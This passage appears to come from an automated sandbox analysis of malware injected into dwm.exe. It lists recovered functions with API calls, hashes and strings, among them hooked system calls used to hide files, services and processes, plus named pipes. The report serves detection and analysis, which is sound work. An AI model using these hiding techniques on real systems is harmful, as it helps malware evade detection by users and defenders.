                                                        • Instruction Fuzzy Hash: CC31F122219B8481EA74DB26E05935E77B4F7887C4F210525F5CE46BA8DF7DC680CB26

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: a60ade9394fe4c35ab755e97a5dfbc478c905fbaa392ae86923eb6e0e9d87758
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 4D116D30A10741A2FB78EB21F80D35933F4AB58B45F714128D9CE85995EF7CC184C232

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                        • Instruction ID: 88b62564cefa99c5df0553c881ea4e992a6981c752067f8587c1bb73a495c4a1
                                                        • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                        • Instruction Fuzzy Hash: 96F0B736228B4484D730DB05E45979ABBB0E388BD4F644116BACD47BA9CB3DC690CB61

                                                        Control-flow Graph

                                                        [Control-flow graph rendered as an image in the original report (legend: Executed / Not Executed); the extracted node/edge list is not reproduced here.]
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AllocLibraryLoadVirtual
                                                        • String ID:
                                                        • API String ID: 3550616410-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 8272c5051e45bb1e08acf4cb034566de5e43c5be223a5e3606f7b74c943da425
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 41610532B01A9087DB66CF29940472D73B2FB94BE4F688521DE9D07788DF38D852C722

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002BAAEDF1628: GetProcessHeap.KERNEL32 ref: 000002BAAEDF1633
                                                          • Part of subcall function 000002BAAEDF1628: HeapAlloc.KERNEL32 ref: 000002BAAEDF1642
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF16B2
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF16DF
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF16F9
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF1719
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF1734
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF1754
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF176F
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF178F
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF17AA
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF17CA
                                                        • Sleep.KERNEL32 ref: 000002BAAEDF1AD7
                                                        • SleepEx.KERNELBASE ref: 000002BAAEDF1ADD
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF17E5
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF1805
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF1820
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF1840
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF185B
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF187B
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF1896
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF18A0
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 030c3e66d5f789bef5497c226e0068f4c419c483030d182e68aceade9474b657
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 7731ED61200B41D2FF50DB27DA493A933B4AB99BC4F6454299E8D8B7D7FF24C851C232

                                                        Control-flow Graph

                                                        [Control-flow graph rendered as an image in the original report (legend: Executed / Not Executed); the extracted node/edge list is not reproduced here.]
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 16ed6b47ea5e35ff7bce0c17d3cc6a2b3e314c65d60c4d9d2a118343faa5b8d7
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: C1B1C172210B9082EB68CF29D8587A973B4F744B94F745116EE8D57B98EF39CD80C3A1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 991226839482be981db0a0c9d0a5b3f0b4c3dfa8c3e3b25629e8c410bb44d143
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 93316D72215B819AEBA0DF60E8947ED7370F784744F54402ADB8E57B98EF38C648C721
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 7d54bd0195f5e20e888b4046c37b92221e6e6a0e16ed04466e2058f5df45964c
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: FA317C36214B809AEB60CF25E8843AE73B0F789758F640126EADD43B98DF38C155CB51

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 7c84d59281942a78493a40752f210f11be734ac56bd795eca8a9807e03bbe614
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 50515D36200B859AEB64CF62E54835AB7B1F789F99F248124DE8907B59DF3CC049CB11

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: c0e7faaba75385aaa4adb1cfac454377c355040c6669c12fb79adebc4bd92ff3
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 4D31D564240A4AB2EA60EF69EC597D43330BB14344FF00413E8CD52976EF3C8689C772

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: e81c386bd8547cca1137d390a578599d5395f434cc6727d434b89f4cfb340a6e
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 4F81F0216006018AFA56AB75948D39937B1EBC5FC0F3494269AED83396DF39C846C733

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000002BAAEDFCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCEBC
                                                        • SetLastError.KERNEL32 ref: 000002BAAEDFCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000002BAAEDFECCC,?,?,?,?,000002BAAEDFBF9F,?,?,?,?,?,000002BAAEDF7AB0), ref: 000002BAAEDFCF2C
                                                          • Part of subcall function 000002BAAEDFD6CC: HeapAlloc.KERNEL32 ref: 000002BAAEDFD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCF54
                                                          • Part of subcall function 000002BAAEDFD744: HeapFree.KERNEL32 ref: 000002BAAEDFD75A
                                                          • Part of subcall function 000002BAAEDFD744: GetLastError.KERNEL32 ref: 000002BAAEDFD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCF76
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 01e7d99de580d2bb8e957ca4e65fd31d41413e7a64f6b3c6e05d97cd56586373
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: E341802070134441FA78E731955D36D73B29F957B4F380728A8BE4AAEADF28C451D237
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: e475c542c3fc8f5e9c1ea63ce18cd68e6815f715107f2c5cb0e10c38f46ac8a1
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: E0213872654B4193EB60CB25E44835A77B0F789BA4F604225EA9942EA8CF3CC149CB12
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 28fd30d8de1863f4827a3e47e8af121b74ce8415f8b2b0d18f529f20809478b0
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: A5E1D472A04B808AEB20DF65D48839D77B0F785B98F604116EECD5BB99CF34C191CB22
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 0e1fcc14573ae700ecef04849d54fe56b69193aba6d354a2f4fcc66dff62847a
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: EFE19972604B808AEB629F75D48839D77B0F795BD8F201116EECD97B9ACB34D091C722
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 4d6808facc4de05c8c68c19d0f6b22d34854e2ef5ce9be60218a6eaeb3d075bd
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 9A41D322311B0095FF76CB26A80879533B5FB49BE0F2941299D8E87B88EF3CC545C326
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 92749279b72a6e3b891d05313cb35e5094250e8cd656c3bd39e6c66893a601a7
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 6A416F33214B84D6E7A0CF21E44879E77B1F389B98F548129DA8D0BB59DF38C989CB51
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD087
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 87ce3cd2b22bdf32f6b5cf4ec293e9ba429de85969ccf05228afd4229d824717
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 1E11942070438451FA68E736A95D36973719B557F8F384724A8BE07BEADF28C442D223
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 1318caf13de8b04a23ce044cac0dd516da927a54ba5e8a2999e94ee861b58642
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: A68108207303429AFBA4DB65A84D3D937B1AB85780F744425E9CC47B96EB7AC845C733
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 06ae3486feda111ada41b0278c961c7cd4cf5308fd5a5969803fd1c8fc0baebe
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: CA31C621713B40E1EF61DB82A81875933B4F748BA0F7985259DAE0B794DF39C585C322
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: db8a81eff005282016f07d83c28d67647e7a48e49bc93c9820ba17fe59873458
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 55116A21350B8196E7B08B52E848319B7B0F798FE4F244224EAAE87FA4CF78C955C751
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 737f97488920e4ae6f5cef42b43d3862bc3f78a164ca931e418828c5db40b557
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 2131B022711B5292EA64DF1BE94876A77B0FB45B80F184035AFCC47B56EF38C4A1C321
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 4acdcfdcf3885ad74f3085b933b891c07e4902976b71fe125519cc4dffcd31bd
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 06115E2074138082FA64E732A55D3297372AF957F8F344724A8BE47BEADF68C451D622
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 90be1499755b067608b3a1df86aeecd890f9a03b3d1fb6898e7e9a42c7c4878a
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 8F015B21300A4196EA64DB52A45C35973B1FB88BC4F684035DE8D43B55DF3CC54AC751
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: d37d57f8f0fef868811603db5eefe68ef8ce8799f104095edb307b5e953f2a0a
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: E3011765751B41D2FF749B25E81C31973B0BB59B86F244428DA8D07B65EF3DC148C722
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
